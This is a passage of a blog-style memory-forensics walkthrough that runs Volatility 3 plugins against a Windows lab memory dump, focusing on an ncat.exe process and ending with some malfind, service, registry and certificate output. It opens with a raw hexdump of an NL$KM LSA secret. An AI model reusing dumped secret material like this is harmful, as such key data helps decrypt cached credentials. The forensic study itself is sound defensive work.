NL$KM   @×ç­s¶o(ôÛQÙSGÔÀÙ²7e¿Â¡Û#jåh®X8'c`:Aݤ¨u¹▒7=ÁéqÆÿÿC}ºR5uù    40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d7 e7 ad 73 b6 6f 28 f4 db 51 12 d9 53 47 86 d4 0f c0 d9 b2 37 65 bf 53 97 08 c2 a1 db 23 9f 6a e5 9d 68 ae 9c 9a 58 0e 38 27 63 60 05 06 3a 85 88 41 dd 1b 21 16 1b 75 8a a4 a8 75 b9 18 37 3d 16 c1 e9 10 71 c6 ff ff 43 7d ba 06 52 35 75 f9


Looking to see what version information can be extracted.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.verinfo.VerInfo | more
Volatility 3 Framework 2.0.2    PDB scanning finished                                

PID     Process Base    Name    Major   Minor   Product Build
...
4260    ncat.exe        0x730000        ncat.exe        -       -       -       -
4260    ncat.exe        0x7ffe2ab70000  ntdll.dll       -       -       -       -
4260    ncat.exe        0x7ffe2a810000  wow64.dll       -       -       -       -
4260    ncat.exe        0x7ffe29950000  wow64win.dll    -       -       -       -
4260    ncat.exe        0x771d0000      wow64cpu.dll    -       -       -       -
...

Nothing interesting above.

Taking a look at the Virtual Address Descriptor (VAD)

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.vadinfo.VadInfo --pid 4260                                                       
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Offset  Start VPN       End VPN Tag     Protection      CommitCharge    PrivateMemory   Parent  File    File output

4260    ncat.exe        0xd187bfeeaad0  0x75c20000      0x75e33fff      Vad     PAGE_EXECUTE_WRITECOPY  28      0       0x0     \Windows\SysWOW64\KernelBase.dll     Disabled
4260    ncat.exe        0xd187c1c83e40  0x14a0000       0x14affff       VadS    PAGE_READWRITE  11      1       0xffffd187bfeeaad0      N/A Disabled
...
4260    ncat.exe        0xd187c1fac350  0x730000        0x8d0fff        Vad     PAGE_EXECUTE_WRITECOPY  18      0       0xffffd187bfeeac10  \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe    Disabled
...
 0xffffd187c01f7a60  \Windows\SysWOW64\pcapwsp.dll    Disabled
4260    ncat.exe        0xd187c01f8050  0x3d40000       0x3e3ffff       VadS    PAGE_READWRITE  4       1       0xffffd187bceac5a0      N/A Disabled
...
4260    ncat.exe        0xd187c1c7cc30  0x7ffe7000      0x7ffe7fff      VadS    PAGE_READONLY   1       1       0xffffd187c1fb03b0      N/A Disabled
4260    ncat.exe        0xd187c1c82e00  0x7f290000      0x7f291fff      VadS    PAGE_READWRITE  1       1       0xffffd187c1c7cc30      N/A Disabled
4260    ncat.exe        0xd187bfeedc30  0x7f150000      0x7f24ffff      Vad     PAGE_READONLY   0       0       0xffffd187c1c82e00      N/A Disabled
4260    ncat.exe        0xd187c158d7d0  0x7e110000      0x7e17afff      Vad     PAGE_EXECUTE_WRITECOPY  18      0       
...
4260    ncat.exe        0xd187c1faf730  0x7ffe2ab70000  0x7ffe2ad64fff  Vad     PAGE_EXECUTE_WRITECOPY  16      0       0xffffd187c10da7f0  \Windows\System32\ntdll.dll      Disabled
.......

Get information on existing services

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.svcscan.SvcScan | more                                                           
Volatility 3 Framework 2.0.2    PDB scanning finished                                

Offset  Order   PID     Start   State   Type    Name    Display Binary

0x1887f463cf0   399     0       SERVICE_AUTO_START      SERVICE_RUNNING SERVICE_WIN32_SHARE_PROCESS     RpcEptMapper    RPC Endpoint Mapper -
0x1887f463d00   398     N/A     SERVICE_DEMAND_START    SERVICE_STOPPED SERVICE_WIN32_OWN_PROCESS       rpcapd  rpcapd  N/A
0x1887f463960   397     N/A     SERVICE_DEMAND_START    SERVICE_STOPPED SERVICE_WIN32_SHARE_PROCESS     RmSvc   RmSvc   N/A
0x1887f463ed0   396     N/A     SERVICE_DEMAND_START    SERVICE_STOPPED SERVICE_KERNEL_DRIVER   rhproxy rhproxy N/A
0x1887f468b10   395     N/A     SERVICE_DEMAND_START    SERVICE_STOPPED SERVICE_KERNEL_DRIVER   RFCOMM  RFCOMM  N/A
...

... and additional information on the services

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.getservicesids.GetServiceSIDs | more                                             
Volatility 3 Framework 2.0.2    PDB scanning finished                                

SID     Service

S-1-5-80-4151353957-356578678-4163131872-800126167-2037860865   .NET CLR Networking 4.0.0.0
S-1-5-80-1135273183-3738781202-689480478-891280274-255333391    .NET Memory Cache 4.0
S-1-5-80-3459415445-2224257447-3423677131-2829651752-4257665947 3ware
S-1-5-80-2917441881-3404282297-3983348447-1829381237-2935805708 AarSvc
S-1-5-80-1925620318-959733373-4030606672-1109042073-4287256036  AarSvc_2ea6a
S-1-5-80-1975967573-2913356537-819030703-3730719923-1995772179  AcpiDev
S-1-5-80-2670625634-2386107419-4204951937-4094372046-2600379021 acpiex
S-1-5-80-3267050047-1503497915-401953950-2662906978-1179039408  acpipagr
....

Leveraging the malfind module to find any malware.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.malfind.Malfind --pid 4260
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Start VPN       End VPN Tag     Protection      CommitCharge    PrivateMemory   File output     Hexdump Disasm

4260    ncat.exe        0xf40000        0xf40fff        VadS    PAGE_EXECUTE_READWRITE|PAGE_NOCACHE     1       1       Disabled
68 90 4f 25 77 9c 60 68 h.O%w.`h
14 00 f4 00 e8 5f b7 e0 ....._..
74 61 9d c3 43 00 3a 00 ta..C.:.
5c 00 54 00 6f 00 6f 00 \.T.o.o.
6c 00 73 00 5c 00 43 00 l.s.\.C.
6d 00 64 00 65 00 72 00 m.d.e.r.
5c 00 76 00 65 00 6e 00 \.v.e.n.
64 00 6f 00 72 00 5c 00 d.o.r.\.
0xf40000:       push    0x77254f90
0xf40005:       pushfd
0xf40006:       pushal
0xf40007:       push    0xf40014
0xf4000c:       call    0x75d4b770
...

Testing to see if there is a Skeleton Key, below says "False"

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.skeleton_key_check.Skeleton_Key_Check
Volatility 3 Framework 2.0.2
Progress:  100.00               PDB scanning finished                                
PID     Process Skeleton Key Found      rc4HmacInitialize       rc4HmacDecrypt

612     lsass.exe          False          0x7ffe279d63c0        0x7ffe279d6800

Peeking into the userassist.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.registry.userassist.UserAssist | more                                    
Volatility 3 Framework 2.0.2    PDB scanning finished                                

Hive Offset     Hive Name       Path    Last Write Time Type    Name    ID      Count   Focus Count     Time Focused    Last Updated    Raw D
ata

0xe50a50363000  hive0xe50a50363000      -       -       -       -       -       -       -       -       -       -
0xe50a5048a000  hive0xe50a5048a000      -       -       -       -       -       -       -       -       -       -
0xe50a53827000  \??\C:\Users\SecurityNik\ntuser.dat     ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{9E04CAB2-CC
14-11DF-BB8C-A2F1DED72085}\Count        2021-12-23 15:09:55.000000      Key     N/A     N/A     N/A     N/A     N/A     N/A     N/A
0xe50a53827000  \??\C:\Users\SecurityNik\ntuser.dat     ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{A3D53349-6E
61-4557-8FC7-0028EDCEEBF6}\Count        2021-12-23 15:09:55.000000      Key     N/A     N/A     N/A     N/A     N/A     N/A     N/A
0xe50a53827000  \??\C:\Users\SecurityNik\ntuser.dat     ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{B267E3AD-A8
25-4A09-82B9-EEC22AA3B847}\Count        2021-12-23 15:09:55.000000      Key     N/A     N/A     N/A     N/A     N/A     N/A     N/A
0xe50a53827000  \??\C:\Users\SecurityNik\ntuser.dat     ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{BCB48336-4D
DD-48FF-BB0B-D3190DACB3E2}\Count        2021-12-23 15:09:55.000000      Key     N/A     N/A     N/A     N/A     N/A     N/A     N/A
0xe50a53827000  \??\C:\Users\SecurityNik\ntuser.dat     ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CAA59E3C-47
92-41A5-9909-6A6A8D32490E}\Count        2021-12-23 15:09:55.000000      Key     N/A     N/A     N/A     N/A     N/A     N/A     N/A
0xe50a53827000  \??\C:\Users\SecurityNik\ntuser.dat     ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-AC
E2-4F4F-9178-9926F41749EA}\Count        2022-02-25 18:21:12.000000      Key     N/A     N/A     N/A     N/A     N/A     N/A     N/A
* 0xe50a53827000        \??\C:\Users\SecurityNik\ntuser.dat     ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEB
FF5CD-ACE2-4F4F-9178-9926F41749EA}\Count        2022-02-25 18:21:12.000000      Value   UEME_CTLCUACount:ctor   N/A     0       0       0:00:
00.500000       N/A
ff ff ff ff 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 80 bf 00 00 80 bf ........
00 00 80 bf 00 00 80 bf ........
00 00 80 bf 00 00 80 bf ........
00 00 80 bf 00 00 80 bf ........
00 00 80 bf 00 00 80 bf ........
ff ff ff ff 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
...

Leveraging the pool scanner plugin.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.poolscanner.PoolScanner | grep -i ncat
symbol_table_name1!_EPROCESS    0xd187c11a5000inlayer_name      ncat.exe
symbol_table_name1!_FILE_OBJECT 0xd187c14adcf0  layer_name      \ProgramData\chocolatey\lib\ncat.flare\tools\ncat-portable-5.59BETA1\ncat.exe
symbol_table_name1!_EPROCESS    0xd187c1af3000  layer_name      ncat.exe
symbol_table_name1!_FILE_OBJECT 0xd187c1e11b60  layer_name      \ProgramData\chocolatey\bin\ncat.exe
symbol_table_name1!_FILE_OBJECT 0xd187c1e27960  layer_name      \Windows\Prefetch\NCAT.EXE-4B4B887F.pf
symbol_table_name1!_FILE_OBJECT 0xd187c1e2a200  layer_name      \ProgramData\chocolatey\bin\ncat.exe
symbol_table_name1!_FILE_OBJECT 0xd187c1e326d0  layer_name      \Windows\Prefetch\NCAT.EXE-1B3976EF.pf
symbol_table_name1!_FILE_OBJECT 0xd187c1e347a0  layer_name      \ncat-0
symbol_table_name1!_FILE_OBJECT 0xd187c1e34930  layer_name      \ncat-0

Extracting certificate information.

┌──(securitynik㉿securitynik)-[~/mem_samples]
└─$ vol3 --file SECURITYNIK-WIN-20220225-182235.dmp windows.registry.certificates.Certificates | more                                        
Volatility 3 Framework 2.0.2    PDB scanning finished                                

Certificate path        Certificate section     Certificate ID  Certificate name

Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        AutoUpdate      -
Microsoft\SystemCertificates    AuthRoot        02FAF3E291435468607857694DF5E45B68851868        Sectigo (AddTrust)
Microsoft\SystemCertificates    AuthRoot        0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43        DigiCert
Microsoft\SystemCertificates    AuthRoot        07E032E020B72C3F192F0628A2593A19A70F069E        Certum Trusted Network CA
Microsoft\SystemCertificates    AuthRoot        2796BAE63F1801E277261BA0D77770028F20EEE4        Go Daddy Class 2 Certification Authority
Microsoft\SystemCertificates    AuthRoot        2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E        Sectigo
Microsoft\SystemCertificates    AuthRoot        3679CA35668772304D30A5FB873B0FA77BB70D54        VeriSign Universal Root Certification Authori
ty

Good enough for me at this point. I have a good enough understanding of how to use Volatiliy3




1 comment: